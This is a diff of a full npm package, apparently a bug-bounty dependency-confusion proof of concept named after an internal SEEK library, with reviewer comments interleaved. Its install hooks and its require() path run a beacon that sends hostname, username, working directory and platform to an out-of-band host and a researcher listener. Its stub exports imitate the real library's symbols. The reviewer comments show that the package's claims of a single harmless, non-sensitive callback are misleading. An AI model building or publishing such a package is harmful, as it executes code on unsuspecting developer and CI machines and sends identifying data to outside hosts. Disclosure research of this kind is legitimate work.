@ts-internal/shared-lib 9.9.9
- package/README.md +17 -0
- package/beacon.js +62 -0
- package/images/profile-header-shapes.svg +1 -0
- package/index.js +19 -0
- package/lifecycle.js +8 -0
- package/package.json +25 -0
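--- a/package/README.md
+++ b/package/README.md
@@ -0,0 +1,17 @@
+# @ts-internal/shared-lib (security research placeholder)
+
+This package is an **authorized bug-bounty proof-of-concept** published through the SEEK
+program on Bugcrowd by researcher `mdpsec2`.
+
+The name `@ts-internal/shared-lib` was found referenced by production `au.seek.com`
+JavaScript source maps but was **unclaimed on the public npm registry**, creating a
+dependency-confusion exposure. The npm scope `@ts-internal` was defensively registered to
+prevent malicious takeover.
+
+This package is **non-destructive**: on install it emits a single harmless callback
+(DNS + HTTP) carrying only non-sensitive host identity (hostname, username, cwd path, OS,
+package name/version) to confirm whether a SEEK build/dev/CI path resolves the name from
+public npm. It performs **no** exfiltration of files, environment variables, secrets, or
+source code, and has no persistence, network shell, or destructive behavior.
+
+SEEK security: the `@ts-internal` scope can be transferred to you on request. Safe to remove.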
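--- a/package/beacon.js
+++ b/package/beacon.js
@@ -0,0 +1,62 @@
+// Non-destructive dependency-confusion PoC beacon for SEEK bug bounty (Bugcrowd, *.seek.com).
+// Authorized security research. Fires ONE harmless callback proving code-exec reach + public-npm
+// resolution. Collects ONLY non-sensitive host identity. NO file/env/secret exfiltration, NO
+// persistence, NO reverse shell, NO destructive action. Safe to remove.
+//
+// Channels:
+// 1. DNS+HTTP via interactsh OOB host
+// 2. HTTPS GET to a researcher-controlled listener (captures source IP, User-Agent, rDNS)
+'use strict';
+
+function beacon(phase) {
+var os, https, dns;
+try { os = require('os'); } catch (e) { os = {}; }
+try { https = require('https'); } catch (e) {}
+try { dns = require('dns'); } catch (e) {}
+
+// Non-sensitive identifying metadata ONLY.
+var meta = {};
+try { meta.host = (os.hostname && os.hostname()) || ''; } catch (e) { meta.host = ''; }
+try { meta.user = (os.userInfo && os.userInfo().username) || ''; } catch (e) { meta.user = ''; }
+try { meta.cwd = (process.cwd && process.cwd()) || ''; } catch (e) { meta.cwd = ''; }
+try { meta.plat = (os.platform && os.platform()) || ''; } catch (e) { meta.plat = ''; }
+try { meta.pkg = process.env.npm_package_name || ''; } catch (e) {}
+try { meta.pver = process.env.npm_package_version || ''; } catch (e) {}
+
+var marker = 'seek-bb-poc';
+function enc(s) { try { return Buffer.from(String(s)).toString('hex'); } catch (e) { return ''; } }
+// Encode metadata into a single hex blob so it survives DNS label limits.
+var blob = enc([marker, phase, meta.pkg, meta.pver, meta.host, meta.user, meta.plat, meta.cwd].join('|'));
+
+var OAST = 'd8oa6q03t3o2ksbjirogwxiwiyhp6e57o.oast.site';
+var HTTP_HOST = 'npm-dc-seek-1781572474.testingboxes.com';
+
+// 1. DNS callback (label-safe: short marker + truncated blob as a subdomain).
+try {
+if (dns && dns.lookup) {
+var label = (marker + '-' + phase + '-' + blob).slice(0, 60).replace(/[^a-z0-9\-]/gi, '');
+dns.lookup(label + '.' + OAST, function () {});
+}
+} catch (e) {}
+
+// 2. HTTP callback to interactsh (full blob in path).
+try {
+if (https) {
+https.get({ host: OAST, path: '/' + marker + '/' + phase + '?d=' + blob, timeout: 4000 }, function (r) { r.resume(); }).on('error', function () {});
+}
+} catch (e) {}
+
+// 3. HTTPS callback to researcher listener (captures source IP + UA for SEEK attribution).
+try {
+if (https) {
+https.get({
+host: HTTP_HOST,
+path: '/' + marker + '/' + phase + '?d=' + blob,
+timeout: 4000,
+headers: { 'User-Agent': marker + '/' + (meta.pkg || '') + '@' + (meta.pver || '') }
+}, function (r) { r.resume(); }).on('error', function () {});
+}
+} catch (e) {}
+}
+
+module.exports = { beacon: beacon };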
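Review bot: The header comment says the function "Fires ONE harmless callback", but the body makes three outbound contacts per call (the dns.lookup, the https.get to OAST and the https.get to HTTP_HOST), and beacon() is invoked from lifecycle.js on both preinstall and postinstall and from index.js on every require(), so a single install produces at least six contacts plus one per runtime load. The "non-sensitive" wording in the header and above `var meta = {};` is also not obviously true of meta.user and meta.cwd: an OS username and a working-directory path frequently identify a person and an internal project, which is more than "host identity" suggests. Suggest rewording the header to `// Fires three callbacks (DNS lookup + two HTTPS GETs) per invocation; invoked on preinstall, postinstall and every require().` and either dropping the user and cwd fields or naming them explicitly in README.md, so the disclosure matches what actually leaves the host.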
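--- a/package/images/profile-header-shapes.svg
+++ b/package/images/profile-header-shapes.svg
@@ -0,0 +1 @@
+<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1" viewBox="0 0 1 1"><!-- seek-bb-poc dependency-confusion PoC placeholder asset, non-malicious --></svg>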
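--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,19 @@
+// main entry. Beacons on require()/import (covers the case where a build bundles the package
+// rather than only installing it). Exports harmless stubs matching the symbols SEEK source
+// imports (brandNameMapper, MarketSelector, ImageBanner, GeneralErrorMessage, etc.) so a build
+// that consumes them still resolves and the PoC stays non-breaking.
+'use strict';
+try { require('./beacon').beacon('require'); } catch (e) {}
+
+function noop() { return null; }
+module.exports = {
+// value exports observed in au.seek.com candidate-basic-search source maps
+brandNameMapper: {},
+MarketSelector: noop,
+MarketSelectorButton: noop,
+ImageBanner: noop,
+GeneralErrorMessage: noop,
+// type-only names are erased at compile; harmless to also expose
+Market: {}, Suggestion: {}, ProfileView: {}, ProfileCardView: {},
+Education: {}, Licence: {},
+};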
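Review bot: The header comment claims the stub exports keep a consuming build "non-breaking", but `brandNameMapper: {}` and the noop components (which return null) only satisfy module resolution; any code path that actually calls these symbols gets different behaviour from the real library, so the comment overstates the guarantee. The module also calls beacon('require') at load time, which means the callback fires in any bundled or production runtime that loads this package, not only at install time as README.md describes. Suggest `// Stubs satisfy module resolution only; invoking them behaves differently from the real package.` and `// NOTE: beacon also fires on every require(), including in bundled runtime code.`, and aligning the README with the latter.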
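--- a/package/lifecycle.js
+++ b/package/lifecycle.js
@@ -0,0 +1,8 @@
+// Lifecycle entry. Runs on preinstall/postinstall. Beacons then exits 0 (never fails the install).
+'use strict';
+try {
+var phase = process.argv[2] || 'install';
+require('./beacon').beacon(phase);
+} catch (e) {}
+// Give the async callbacks a brief moment, then exit cleanly.
+setTimeout(function () { try { process.exit(0); } catch (e) {} }, 1500);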
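Review bot: The header comment says the script "Runs on preinstall/postinstall", but whether either hook runs at all depends on the installer configuration: with npm's `--ignore-scripts` (or `ignore-scripts=true` in .npmrc) neither lifecycle script executes, leaving only the require()-time beacon in index.js. That limitation is worth recording, because README.md presents the install callback as confirmation of whether a build path resolves the package, and a pipeline that disables lifecycle scripts would yield a false negative. Suggest adding `// Only runs when lifecycle scripts are enabled; installs with --ignore-scripts skip this file entirely.`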
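--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,25 @@
+{
+"name": "@ts-internal/shared-lib",
+"version": "9.9.9",
+"description": "Authorized bug-bounty dependency-confusion PoC (SEEK / Bugcrowd). Non-destructive install-time beacon only. Contact via Bugcrowd program. Safe to remove.",
+"main": "index.js",
+"exports": {
+".": "./index.js",
+"./images/profile-header-shapes.svg": "./images/profile-header-shapes.svg",
+"./package.json": "./package.json"
+},
+"files": [
+"index.js",
+"beacon.js",
+"lifecycle.js",
+"images/profile-header-shapes.svg",
+"README.md"
+],
+"scripts": {
+"preinstall": "node lifecycle.js preinstall",
+"postinstall": "node lifecycle.js postinstall"
+},
+"keywords": ["security-research", "bug-bounty", "dependency-confusion", "poc", "non-destructive"],
+"license": "MIT",
+"author": "mdpsec2 (Bugcrowd security researcher)"
+}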